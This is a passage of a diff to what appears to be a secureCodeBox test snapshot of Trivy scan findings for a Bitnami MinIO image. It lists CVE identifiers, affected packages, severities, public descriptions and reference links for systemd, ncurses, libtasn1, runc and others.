"https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", - }, - { - "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -68775,66 +69524,36 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "id": "CVE-2023-31438", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", - }, - { - "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - }, - { - "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -68843,4590 +69562,4704 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "id": "CVE-2023-31439", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "4.16.0-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "id": "CVE-2021-46848", + "installedVersion": "4.16.0-2", + "packageName": "libtasn1-6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5707-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "6.2+20201114-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "util-linux", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libtinfo6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "ncurses: segfaulting OOB read", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.5", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-27561", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-27561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", - "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", - "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", - "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", - "https://github.com/opencontainers/runc/issues/3751", - "https://github.com/opencontainers/runc/pull/3785", - "https://github.com/opencontainers/runc/releases/tag/v1.1.5", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", - "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", - "https://ubuntu.com/security/notices/USN-6088-1", - "https://ubuntu.com/security/notices/USN-6088-2", - "https://www.cve.org/CVERecord?id=CVE-2023-27561", - ], - }, - "category": "Vulnerability", - "description": "runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "volume mount race condition (regression of CVE-2019-19921)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-27561", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-27561", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libtinfo6", + "references": [ + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", + ], + }, + "category": "Vulnerability", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Local users can trigger security-relevant memory corruption via malformed data", + "references": [ { "type": "URL", - "value": "https://github.com/opencontainers/runc/issues/3751", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/pull/3785", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.5", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-1", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-2", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-27561", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.0", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43784", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43784", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", - "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", - "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", - "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", - "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", - "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", - "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", - "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", - "https://pkg.go.dev/vuln/GO-2022-0274", - "https://www.cve.org/CVERecord?id=CVE-2021-43784", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc, netlink is used internally as a serialization system for specifying the relevant container configuration to the \`C\` portion of the code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure). runc version 1.0.3 contains a fix for this bug. As a workaround, one may try disallowing untrusted namespace paths from your container. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug.", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "runc: integer overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43784", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43784", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", 